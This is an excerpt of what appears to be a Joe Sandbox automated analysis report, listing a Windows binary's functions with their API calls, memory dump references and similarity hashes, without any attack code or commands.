                    • Opcode ID: 7f2c1c49c8e352e74af8bc72f221c6e3b8dcdc694585907733afa3e356209541
                    • Instruction ID: e20552439adc0f624067b51b3e2bdce35cc1a35b1526582f3a9f644fb2427375
                    • Opcode Fuzzy Hash: 7f2c1c49c8e352e74af8bc72f221c6e3b8dcdc694585907733afa3e356209541
                    • Instruction Fuzzy Hash: 3F219531B00208ABDF109A65CC8EFAE7BA9EF4A710F04402DF905DB291DA708E45D792
                    Function 00C712F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C7134D
                    • SelectObject.GDI32(?,00000000), ref: 00C7135C
                    • BeginPath.GDI32(?), ref: 00C71373
                    • SelectObject.GDI32(?,00000000), ref: 00C7139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 81cd996f42f712decdc2e2cb0ac7c75c5e10da89b8c88dcb5c988c2b834a11bb
                    • Instruction ID: bf604ed3577171a7accc14ad1414201115c47842fd697d5ba402b685811e462e
                    • Opcode Fuzzy Hash: 81cd996f42f712decdc2e2cb0ac7c75c5e10da89b8c88dcb5c988c2b834a11bb
                    • Instruction Fuzzy Hash: CC211B70800304EBDB119F29DC04BA97BA8FB04361F58C22AF924962F1D771D991EBA1
                    Function 00CCC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 7a7a381b771c7e96ff096b017ffc7d12648b4dd678876a14b9da21d0791ea429
                    • Instruction ID: 1fe21aabaec7d2f698fb50e87a11d5bffd33d3d68abae2af736231e9ff3d9383
                    • Opcode Fuzzy Hash: 7a7a381b771c7e96ff096b017ffc7d12648b4dd678876a14b9da21d0791ea429
                    • Instruction Fuzzy Hash: 1C0192A2A051067BE605A623DCCAFBF775CDB21394F0C4029FE1C96283E6509E1592F5
                    Function 00CD4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00CD4D5C
                    • __beginthreadex.LIBCMT ref: 00CD4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 00CD4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CD4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CD4DAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 6ce540c69a75539a3881b4d3f6b5f17635deb9580dab2ca057cd4dfd0ecc8ab7
                    • Instruction ID: a186fd4a5f37f0aa4ef0d2a01b61d484239af1aa81e95c74d2191ce5e47e7376
                    • Opcode Fuzzy Hash: 6ce540c69a75539a3881b4d3f6b5f17635deb9580dab2ca057cd4dfd0ecc8ab7
                    • Instruction Fuzzy Hash: 4E11E576904208BFC7059BA8DC08BAF7BADEB45320F14826AFA24D3350D6B18D0487B1
                    Function 00CC874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CC8766
                    • GetLastError.KERNEL32(?,00CC822A,?,?,?), ref: 00CC8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,00CC822A,?,?,?), ref: 00CC877F
                    • RtlAllocateHeap.NTDLL(00000000,?,00CC822A), ref: 00CC8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CC879D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 883493501-0
                    • Opcode ID: 10078be6291e7c51fb68a1f1c4fe21bb50aa46b56590a753510a17be2e949f3f
                    • Instruction ID: bb170177f9bd7f1051e5e70038d8e85553c73ab8b6d7411633ae5f662420e329
                    • Opcode Fuzzy Hash: 10078be6291e7c51fb68a1f1c4fe21bb50aa46b56590a753510a17be2e949f3f
                    • Instruction Fuzzy Hash: 1A014671200204EFDB204FA6DC88FAF7BACEF8A355B20043DF949C2260EA318D45CB61
                    Function 00CD54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CD5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CD5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD555E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: 699bfbd0655149355f1bb232e6f2a034fad57ad42275e0c9886295b47d6c9d6f
                    • Instruction ID: a75eb8128e517a335df85f7b89e6ff05a72cd67de3d78c82560e394723c58cdf
                    • Opcode Fuzzy Hash: 699bfbd0655149355f1bb232e6f2a034fad57ad42275e0c9886295b47d6c9d6f
                    • Instruction Fuzzy Hash: 1F011B76D04A19DBCF01DFE9E848BEDBB79FF09711F00405AEA11B2250EB305655C7A2
                    Function 00CC85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CC8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CC8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CC8621
                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00CC8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CC863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 47921759-0
                    • Opcode ID: fac1bdfed14febf33da26a9608a7bee0da63c4a72fe7c00edb1e3dbb3b018149
                    • Instruction ID: a65db5a4d46020b0d63f14af22bc93b4ea524bae377a8a8f80a4c37c8cac6dba
                    • Opcode Fuzzy Hash: fac1bdfed14febf33da26a9608a7bee0da63c4a72fe7c00edb1e3dbb3b018149
                    • Instruction Fuzzy Hash: D2F04931201204BFEB104FA5DC89F7F3BACEF8A754B00442DF949C6260CB619D4ADA61
                    Function 00CC8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CC8669
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CC8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CC8682
                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00CC8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CC869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 47921759-0
                    • Opcode ID: a5a3725a2728250010d123fbb37e2939c041f647426100ba48ae79bc15312172
                    • Instruction ID: e6c8e91c1b1a3bb9ed1fc104d04186eb744ce07c7d8939f8086daeb197c321b7
                    • Opcode Fuzzy Hash: a5a3725a2728250010d123fbb37e2939c041f647426100ba48ae79bc15312172
                    • Instruction Fuzzy Hash: C0F04F71240204AFEB111FA5EC88FBF3BACEF89B58B10002DF955C6150CF659946DA61
                    Function 00CCC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00CCC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CCC6D1
                    • MessageBeep.USER32(00000000), ref: 00CCC6E9
                    • KillTimer.USER32(?,0000040A), ref: 00CCC705
                    • EndDialog.USER32(?,00000001), ref: 00CCC71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 224f34e5bd553ca22b0a2e131a84a3954d12f365d1bc38a44e69ad758ab5436e
                    • Instruction ID: d29d89d719723ab1aed0ff4314efdbfee2964319318b202e472941f314e90894
                    • Opcode Fuzzy Hash: 224f34e5bd553ca22b0a2e131a84a3954d12f365d1bc38a44e69ad758ab5436e
                    • Instruction Fuzzy Hash: 5D014F30500704ABEB215B20DD8EFAA77B8FF00B05F00066DF556E14E1DBE0A955CB81
                    Function 00C713B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • EndPath.GDI32(?), ref: 00C713BF
                    • StrokeAndFillPath.GDI32(?,?,00CABAD8,00000000,?), ref: 00C713DB
                    • SelectObject.GDI32(?,00000000), ref: 00C713EE
                    • DeleteObject.GDI32 ref: 00C71401
                    • StrokePath.GDI32(?), ref: 00C7141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: 6c1f8ce992e6ce2307156cf97c2b97963630198ac86540642cb9d3c432cd656d
                    • Instruction ID: 14e555aaa42c41374bdec13e35ae5931daa84d3ae2151fe1036f7bffe89ea076
                    • Opcode Fuzzy Hash: 6c1f8ce992e6ce2307156cf97c2b97963630198ac86540642cb9d3c432cd656d
                    • Instruction Fuzzy Hash: 97F0EC30004308FBDB115F2AEC4C7683FA5EB05366F48C229EA69852F1CB318996EF71
                    Function 00CC8E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CC8E7F
                    • CloseHandle.KERNEL32(?), ref: 00CC8E94
                    • CloseHandle.KERNEL32(?), ref: 00CC8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00CC8EA5
                    • HeapFree.KERNEL32(00000000), ref: 00CC8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                    • String ID:
                    • API String ID: 3751786701-0
                    • Opcode ID: 32d3eca7540dc0334a224593175a7e4fcc6a07649744c0d35ea77ab2dd0dab1e
                    • Instruction ID: 49bf7ce5de3f4f00c5ce7dca25cb245e9480e6450232658a48c34455659cf18d
                    • Opcode Fuzzy Hash: 32d3eca7540dc0334a224593175a7e4fcc6a07649744c0d35ea77ab2dd0dab1e
                    • Instruction Fuzzy Hash: 27E0A536004001EBD6011BA1EC08B2DBB69EF893227148225F21581070CB325422DB51
                    Function 00C82E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C90FF6: std::exception::exception.LIBCMT ref: 00C9102C
                      • Part of subcall function 00C90FF6: __CxxThrowException@8.LIBCMT ref: 00C91041
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00C77BB1: _memmove.LIBCMT ref: 00C77C0B
                    • __swprintf.LIBCMT ref: 00C8302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C82EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: 1dd45cb114d88c46f1800ea609d933349b5b620b492886ca5c4524fbd0904ad4
                    • Instruction ID: 819491f82e85f4577921028072ffc29e9e5e9aedcc077c575a18e7004ebf5828
                    • Opcode Fuzzy Hash: 1dd45cb114d88c46f1800ea609d933349b5b620b492886ca5c4524fbd0904ad4
                    • Instruction Fuzzy Hash: AA91AA311082419FCB18FF64C885D6EB7A4EF85754F00891EF89A9B2A1DB30EE04EB56
                    Function 00C9524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00C952DD
                      • Part of subcall function 00CA0340: __87except.LIBCMT ref: 00CA037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 589cfae2c90b3ff0cf1272d33b5abd78a0f0e63ad5e4c9e4c029f4ad73e7a013
                    • Instruction ID: 996022ba6c1f3c3c5c587eb11ece19980180f715807ee919de201488a0fbe31c
                    • Opcode Fuzzy Hash: 589cfae2c90b3ff0cf1272d33b5abd78a0f0e63ad5e4c9e4c029f4ad73e7a013
                    • Instruction Fuzzy Hash: 51516A21E0DB0387DF127724C95537E2B90BB02794F304D58E4A9862F9EE748ED4EB56
                    Function 00C9023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: cc51b278f83e5c24dcc9ac7673711a4b35486cb6e6aa907994e1493b95dcdb1a
                    • Instruction ID: 189b9ca2f9eb89e576d080fb24cba1baa92c4a569681f464cf7eaf630affee33
                    • Opcode Fuzzy Hash: cc51b278f83e5c24dcc9ac7673711a4b35486cb6e6aa907994e1493b95dcdb1a
                    • Instruction Fuzzy Hash: E2510175504746DFCF159F28C488BFA7BA4FF19310F684059E8A29B2A0D734AE82DB61
                    Function 00C862F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: 174fbb8847b80cef9db1964099e158de0508ddfef09d46319048e0375a7b1930
                    • Instruction ID: faf9b3c2394d2173810f7f2437736348073bcbed622d7ed6f0e01877cf17e97a
                    • Opcode Fuzzy Hash: 174fbb8847b80cef9db1964099e158de0508ddfef09d46319048e0375a7b1930
                    • Instruction Fuzzy Hash: D851CE71900319DFCB24DF65C885BAEBBF4EF44318F24856EE95ACA241E771E680CB54
                    Function 00CF7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CFF910,00000000,?,?,?,?), ref: 00CF7C4E
                    • GetWindowLongW.USER32 ref: 00CF7C6B
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CF7C7B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: 47c5fe05ab010f4ce14872cd513572c45c9acf363dbd1606307dd3cddcb78fb1
                    • Instruction ID: 060e59a8489b9a6ff2f1c1e8f71ee74fa89496a6d26b4138083869231085efbb
                    • Opcode Fuzzy Hash: 47c5fe05ab010f4ce14872cd513572c45c9acf363dbd1606307dd3cddcb78fb1
                    • Instruction Fuzzy Hash: 3431B031204209ABDB518F38DC41BEA77A9EF45324F248725FA79D32E0C731ED519B60
                    Function 00CF7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CF76D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CF76E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CF7708
                    Strings
